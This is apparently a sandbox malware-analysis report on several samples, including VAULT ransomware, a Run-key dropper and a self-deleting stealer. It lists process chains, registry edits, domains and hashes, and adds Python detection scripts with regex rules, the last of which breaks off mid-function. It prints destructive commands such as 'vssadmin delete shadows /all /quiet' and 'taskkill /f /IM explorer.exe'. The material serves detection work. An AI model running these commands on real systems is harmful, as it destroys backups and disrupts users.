C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic process call create "vssadmin.exe delete shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\mshta.exe

mshta.exe C:\Users\Admin\Desktop\VAULT.hta

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\mshta.exe

mshta.exe C:\Users\Admin\Desktop\VAULT.hta

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 360
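Two details in the process list above matter for detection. The shadow copies are not deleted by the malware directly but by `wmic process call create "vssadmin.exe delete shadows /all /quiet"`, so the vssadmin.exe process that actually runs is created by the WMI provider host, not by the injected svchost.exe, and a rule that keys on vssadmin's parent never sees the malware. The ransom note is launched with `mshta.exe C:\Users\Admin\Desktop\VAULT.hta`, with a second copy of VAULT.hta dropped into the Startup folder (see Files below) so it reopens on every logon. The script below is an added example and not part of the report; it runs three command-line rules over constructed process-creation events. PIDs 576, 2396 and 2516 are taken from the report; the vssadmin, vssvc and WmiPrvSE PIDs, the WmiPrvSE parent and the benign `vssadmin list shadows` event are made up for the example.

```python
import re

# Constructed process-creation events modelled on the behavioral25 process list.
# PIDs 576, 2396 and 2516 come from the report; PIDs 620, 1000, 3080, 3100, 3120
# and 3300 and the WmiPrvSE parent are assumptions made for this example.
EVENTS = [
    {"pid": 576, "ppid": 2576, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r"C:\Windows\SysWOW64\svchost.exe"},
    {"pid": 2396, "ppid": 576, "image": r"C:\Windows\SysWOW64\Wbem\wmic.exe",
     "cmdline": 'wmic process call create "vssadmin.exe delete shadows /all /quiet"'},
    {"pid": 3080, "ppid": 620, "image": r"C:\Windows\system32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe"},
    {"pid": 3100, "ppid": 3080, "image": r"C:\Windows\system32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 3120, "ppid": 620, "image": r"C:\Windows\system32\vssvc.exe",
     "cmdline": r"C:\Windows\system32\vssvc.exe"},
    {"pid": 2516, "ppid": 576, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\Admin\Desktop\VAULT.hta"},
    # benign administrative query: must not fire
    {"pid": 3300, "ppid": 1000, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
]

# (ATT&CK id, description, pattern). The first rule matches both the wmic line,
# which carries the vssadmin command as an argument, and the vssadmin process itself.
RULES = [
    ("T1490", "shadow copies deleted",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("T1047", "process launched through WMI",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("T1218.005", "mshta running an .hta from a user-writable path",
     re.compile(r"\bmshta(?:\.exe)?\b.*\\users\\[^\\]+\\(?:desktop|appdata)\\.*\.hta\b", re.I)),
]


def scan(events):
    """Map pid -> list of matching technique ids, in RULES order."""
    hits = {}
    for ev in events:
        ids = [tid for tid, _, rx in RULES if rx.search(ev["cmdline"])]
        if ids:
            hits[ev["pid"]] = ids
    return hits


def lineage(events, pid):
    """Lower-cased image basenames from pid upward until the parent is unknown."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for pid, ids in sorted(scan(EVENTS).items()):
        print(pid, ids, " <- ".join(lineage(EVENTS, pid)))
```

The lineage of the vssadmin.exe event stops at wmiprvse.exe, while the wmic.exe event leads back to the hollowed svchost.exe; correlating the two on the command-line text (the vssadmin arguments appear verbatim in both) is what ties the shadow-copy deletion back to the sample.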

Network

Country Destination Domain Proto
US 8.8.8.8:53 hollandfintech.net udp

Files

memory/2536-0-0x00000000003C0000-0x00000000003C5000-memory.dmp

memory/2772-1-0x0000000000300000-0x0000000000400000-memory.dmp

memory/2772-7-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-17-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-14-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-18-0x0000000000400000-0x000000000040F1F7-memory.dmp

memory/2772-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2772-11-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-5-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-13-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-10-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-3-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-19-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2796-21-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2796-22-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2760-68-0x0000000000610000-0x0000000000626000-memory.dmp

memory/2796-67-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2760-69-0x0000000000610000-0x0000000000626000-memory.dmp

C:\Windows\SysWOW64\Fontcore\Fontcore.cmd

MD5 1105f1e5cd13fc30fde877432e27457d
SHA1 108f03f9c98c63506dd8b9f6581f37ae5c18de23
SHA256 dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d
SHA512 49e9e4b02f432b9cc8f36913ce275f1d13672be627119c183713b5d6fb9fe27fd2cea67421560a463aaa16db35feb15df7c45258e2d102b5f70edb02865d9373

memory/2760-71-0x0000000000610000-0x0000000000626000-memory.dmp

memory/2576-73-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2576-72-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2576-74-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/576-79-0x00000000000D0000-0x00000000000FE000-memory.dmp

memory/576-78-0x0000000000F30000-0x0000000000F38000-memory.dmp

memory/1840-82-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/952-85-0x0000000000F30000-0x0000000000F38000-memory.dmp

memory/1672-88-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/1672-87-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/952-84-0x0000000000F30000-0x0000000000F38000-memory.dmp

C:\VAULT.KEY

MD5 b016dd85b94d4020c3b00c65e88da2e2
SHA1 5bd57cb6b76db8b9aa421d915c0fd08583e5e94f
SHA256 910274869f619ebe2d6146453d08b6861c7770a0316c961ea51a07dec83e2e89
SHA512 803d08df67fa3c67f81f586838a8389011896aebd12354fb4c0795f747bdcdb0876996939a7d31a5bc087d962efc48050784c58eaccedcdf09a612d0b17d209c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta

MD5 ca834cc56015bce8e010e356c69dc9f5
SHA1 b55ea373d3f5d583c33803d80059db5ddccf7038
SHA256 1b5feb1b9bf79a857330fc891a65824953ad5d72ce38b4fb41755475775c65bd
SHA512 66c6370c538567286641e2ca3438d28572a78b4d2a15912f9d55cc65f9c7491d16e3f277c9f1385ee6773ef400e1a47e7abe5208aa4d7f75b8db5c816e6531a8

C:\VAULT.KEY

MD5 0a76640b1de589bfa790d454b95a3827
SHA1 6285d00315382fe81a9270dd3ea345a18bfbccc9
SHA256 bfb33881f161969d0d7982e6596016ad7ee3db61746bbb227ca9de5be8508ae4
SHA512 97d95835bc2828111a7671849f741763e8e857cc2ef130c39295f8e78e796ad0c24ad5d0ce80341e039b79ff83782f48f02e45ef03707131a0224fac36829b67

C:\VAULT.KEY

MD5 5dd572e3080fff1818b87382e6ead887
SHA1 dc758af74b6789700ec3fca49afe0397d5c53415
SHA256 3b1c1d9154a1e10e689e8119fe3444aab37c40d63d7dab4cd78c8b8198aa6270
SHA512 f5c96169fc54c283623e47da1ffc6b414b937f344022e46f68164ae4027be4ca857ff7585a88baea8ed534b3341f8b6ae829de4c3e4aa6e24de8f079ca6b5e43

C:\VAULT.KEY

MD5 bc42e4fdf1cf03c333764adbabab2a0e
SHA1 71cf5a46e1a5cc86d4abfb7f0259930126e13b7f
SHA256 61ec94418f4f7e48c211652bea4766fa279c0af0acb2b1970be0e3c06bd28d09
SHA512 3eaaa7aa484078d6b5c03d7ab2325d69c074a0b5e650cb75445add0a5778f145d118a61c9fd2ae6d4288e2eee25b9314427b164ad9dc7d92bf81a11dbdbc93a1

C:\VAULT.KEY

MD5 49449553a16c8632f7bee68abab535e5
SHA1 d1c7a97df0d9ad711304a60e0c302947ffdcf635
SHA256 2a254d1e455f463facc14f59fb0c1512e617304354bf7053c8e75db6581bb607
SHA512 3b012b8c93b57b34e702aee2d8002e0f5bc34d576cc409c57cd0244e72e7bb5e9013f8f6e0b793b318faed99020ff584af99661e0a00e1571aa40a4139fd94af

memory/576-180-0x0000000000260000-0x0000000000272000-memory.dmp

memory/576-184-0x0000000000F30000-0x0000000000F38000-memory.dmp

C:\VAULT.KEY

MD5 0bf3c28b0982a4ed6fc9222e6cb4281a
SHA1 d54d86e52ecebfcdee786e2b43ae6c75911f1369
SHA256 cd15cd3d3fe5435949c1d5040d553729dcfd7ecf99e1afd8f30a24ce11e4ab35
SHA512 f8f5aecb66dea9225f5e98d59b5103158502879c517725bdf720203a1027bf2bfcb508aada5d3c960871346ef4fdfc3323353f513227d006db371bf18f76bfb5

memory/576-196-0x00000000000D0000-0x00000000000FE000-memory.dmp

memory/2876-199-0x0000000000720000-0x00000000009A1000-memory.dmp

memory/2876-200-0x0000000000720000-0x00000000009A1000-memory.dmp

memory/1748-202-0x0000000000D50000-0x0000000000D58000-memory.dmp

memory/1748-203-0x00000000001F0000-0x000000000021E000-memory.dmp

memory/2792-207-0x0000000000720000-0x00000000009A1000-memory.dmp

memory/2792-206-0x0000000000720000-0x00000000009A1000-memory.dmp

C:\Windows\SysWOW64\Fontcore\Fontcore.lnk

MD5 af2d46d20855f6cea0a291a819778b20
SHA1 f022a7d64f820f269aaa31839d03b42d9930f9b6
SHA256 d1807a78e2b610bfa27cb194d80ef533504f162fe0e3b745bc5e6d5ba1889dc0
SHA512 35c531fd437f5fc8cfc1a8e3451e9187888acfe56b54fd11d3cfef49f5baee3784df8db6a343f9d3f57d517c4ae6c85dd78a8eac31d01e6b3b9ff9cc864a5aa4

memory/1748-228-0x0000000000D50000-0x0000000000D58000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240729-en

Max time kernel

363s

Max time network

364s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\f002618c01fe652f7f00eabd0e890e4992ccce818dfb2863e82c43f793685635.apk"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 22d1c62500e9c4818901195acf82136c
SHA1 b67b404c691517df7d7ec2e3b74298d548ae358f
SHA256 d38b7a0bb68d724f80af4aefc40341535c047f42cce1e75d765d43a8ba003df3
SHA512 aa28c24214fda661e4a4a068eee1b8a9370e2ef23eaad7db1abdabe6445f71a00e912957d48985813aa49d4e5ef44005a06aa47aea842cdfde9936fac9140578

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:24

Platform

win7-20241010-en

Max time kernel

600s

Max time network

366s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\delta.exe" C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\pacman.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Users\Admin\AppData\Local\Microsoft\pacman.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe
PID 2900 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe

"C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe"

C:\Users\Admin\AppData\Local\Microsoft\pacman.exe

C:\Users\Admin\AppData\Local\Microsoft\\pacman.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 myplacehome.comuv.com udp
US 8.8.8.8:53 myplacehome.comuv.com udp
US 8.8.8.8:53 myplacehome.comuv.com udp

Files

memory/2900-0-0x0000000074B2E000-0x0000000074B2F000-memory.dmp

memory/2900-1-0x0000000001330000-0x00000000013E2000-memory.dmp

memory/2900-2-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-3-0x0000000074B20000-0x000000007520E000-memory.dmp

\Users\Admin\AppData\Local\Microsoft\pacman.exe

MD5 6464e51a6ee9d8ee9fad33430c24ecab
SHA1 fdca62379b1d54d85746cbb228a0d981376ec2f5
SHA256 68931ef9cf810d5a69d8ebf33155db7845fffcc685b1ae9f0670803bb97228cc
SHA512 313dc913dd5b769954d8df68290a8b6b44a8a3f271aec9cb00b44fdcf78e6f1c50542fb755cec61ef5965406acea9cdfe5856fd5f64af6f0f05ff2cc84be0790

memory/2808-10-0x00000000000C0000-0x00000000000DC000-memory.dmp

memory/2808-11-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2808-14-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-15-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-57-0x0000000074B2E000-0x0000000074B2F000-memory.dmp

memory/2900-58-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-59-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2808-60-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2808-61-0x0000000074B20000-0x000000007520E000-memory.dmp

memory/2900-62-0x0000000074B20000-0x000000007520E000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:19

Platform

win7-20240903-en

Max time kernel

359s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d.exe

"C:\Users\Admin\AppData\Local\Temp\e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d.exe"

Network

N/A

Files

memory/2384-0-0x000007FEF5D93000-0x000007FEF5D94000-memory.dmp

memory/2384-1-0x0000000000AB0000-0x0000000000AE6000-memory.dmp

memory/2384-2-0x000007FEF5D93000-0x000007FEF5D94000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:30

Platform

win7-20240708-en

Max time kernel

360s

Max time network

361s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe

"C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Mozilla\EXTENS~1\B0B9TM~1.BAT

C:\Windows\SysWOW64\attrib.exe

attrib -R -S -H "C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -R -S -H "C:\Users\Admin\AppData\Roaming\Mozilla\Extensions\B0B9.tmp.bat"
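The "Deletes itself" signature above comes from a common pattern: the sample drops a batch file under AppData\Roaming, runs it through cmd.exe, and the batch clears the read-only, system and hidden attributes of the original executable and of the batch file itself before removing them. Note that cmd.exe is given the 8.3 short form of the path (EXTENS~1\B0B9TM~1.BAT) while attrib.exe receives the long form (Extensions\B0B9.tmp.bat), so a detection that tries to tie the attrib target back to cmd's argument by string comparison fails. The script below is an added example, not part of the report; it instead compares each attrib target against the image path of the attrib process's ancestors, which is the same string in both places. PID 3032 is the sample's PID from the memory-dump names above; the cmd.exe and attrib.exe PIDs and the sample's parent are made up for the example.

```python
import re

# Constructed process events for the behavioral31 chain. PID 3032 comes from the
# report's memory-dump names; PIDs 1234, 3060, 3080 and 3096 are assumptions.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\f9151107655aaa6db995888a7cb69ada.exe"
EVENTS = [
    {"pid": 3032, "ppid": 1234, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 3060, "ppid": 3032, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Mozilla\EXTENS~1\B0B9TM~1.BAT"},
    {"pid": 3080, "ppid": 3060, "image": r"C:\Windows\SysWOW64\attrib.exe",
     "cmdline": f'attrib -R -S -H "{SAMPLE}"'},
    {"pid": 3096, "ppid": 3060, "image": r"C:\Windows\SysWOW64\attrib.exe",
     "cmdline": r'attrib -R -S -H "C:\Users\Admin\AppData\Roaming\Mozilla\Extensions\B0B9.tmp.bat"'},
]

TARGET_RE = re.compile(r'"([^"]+)"\s*$|(\S+)\s*$')


def attrib_target(cmdline):
    """Last argument of an attrib command line, with surrounding quotes removed."""
    m = TARGET_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def clears_protection(cmdline):
    """True when attrib removes the read-only, system or hidden bit (what precedes a del)."""
    return re.search(r"(?<!\S)-[rsh](?!\S)", cmdline, re.I) is not None


def uses_short_names(cmdline):
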